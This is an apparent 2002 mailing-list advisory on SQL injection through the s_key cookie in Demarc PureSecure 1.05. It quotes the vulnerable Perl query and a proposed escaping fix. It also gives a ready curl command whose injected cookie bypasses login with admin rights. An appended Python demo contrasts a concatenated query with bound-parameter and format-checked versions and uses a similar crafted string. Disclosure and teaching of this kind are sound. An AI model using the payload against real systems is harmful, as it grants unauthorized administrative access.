Demarc PureSecure 1.05, maybe other versions (user can bypass login)

From: pokleyzz sakamaniaka (pokleyzzat_private)
Date: Mon Apr 15 2002 - 00:32:18 PDT


    
    Demarc PureSecure (http://www.demarc.org) is an 
    all-inclusive network monitoring solution that allows 
    you to monitor an entire network of servers from one 
    powerful web interface.
    
    A user can bypass login and get admin status by SQL 
    injection through the s_key cookie.
    
    --------- line 319 ------------------------------
    elsif (($cookies{'s_key'}) && ($cookies{'s_key'}->value)){
    	$logged_in_as = &check_login($cookies{'s_key'}->value);
    	if (!$logged_in_as){
    		&print_login_screen;
    		&safe_exit;
    	}
    -----------------------------------------------------
    
    The s_key value is then used in the SQL query in function 
    check_login (line 6114):
    
    --------- line 6114 ---------------------------------
    $sql_query = "	SELECT \
    			f1,f2,f3,admin,username,UNIX_TIMESTAMP(current_login_timedate) AS LOGINTIME \
    		FROM \
    			dm_sessions \
    		WHERE current_session_id = '$session_id' ";
    -----------------------------------------------------
    
    -=solution=-
    line 6113: &safe_slash(\$session_id);
    
    using curl (http://curl.haxx.se/download/):
    curl -b s_key=\'%20OR%20current_session_id%20like%20\'%\'%23 https://<host>/dm/demarc
    
    
    http://www.inetd-secure.net
    http://www.mybsd.org
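
The session lookup described in the post, next to a hardened form, as an added example that is not part of the original message or of Demarc's code. It is a Python/SQLite stand-in for the Perl/MySQL code and uses bound parameters plus a format check rather than the safe_slash escaping the post proposes; the table columns, the 32-hex session id format, the sample rows and the function names are assumptions.

```python
import re
import sqlite3

# Assumption: session ids are 32 lowercase hex characters (format not given in the post).
SESSION_ID_RE = re.compile(r"\A[0-9a-f]{32}\Z")

# Constructed value modelled on the cookie in the post, with SQLite's "--" comment.
CRAFTED = "' OR current_session_id LIKE '%' --"


def make_db():
    """In-memory stand-in for dm_sessions, filled with constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE dm_sessions ("
               "current_session_id TEXT PRIMARY KEY, username TEXT, admin INTEGER)")
    db.executemany("INSERT INTO dm_sessions VALUES (?, ?, ?)", [
        ("0123456789abcdef0123456789abcdef", "admin", 1),
        ("fedcba9876543210fedcba9876543210", "viewer", 0),
    ])
    return db


def check_login_concat(db, session_id):
    """Pattern from line 6114: the cookie value becomes part of the SQL text."""
    sql = ("SELECT username, admin FROM dm_sessions "
           "WHERE current_session_id = '" + session_id + "'")
    return db.execute(sql).fetchone()


def lookup_bound(db, session_id):
    """Same lookup with the value bound as a parameter, so it is only ever data."""
    sql = "SELECT username, admin FROM dm_sessions WHERE current_session_id = ?"
    return db.execute(sql, (session_id,)).fetchone()


def check_login_hardened(db, session_id):
    """Reject anything that is not a well-formed session id, then use the bound lookup."""
    if not isinstance(session_id, str) or not SESSION_ID_RE.match(session_id):
        return None
    return lookup_bound(db, session_id)


if __name__ == "__main__":
    db = make_db()
    for name, fn in [("concat", check_login_concat), ("bound", lookup_bound),
                     ("hardened", check_login_hardened)]:
        print(name, "->", fn(db, CRAFTED))
```

Binding alone already stops the cookie value from changing the query; the format check additionally rejects malformed cookies before the database is touched.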
    


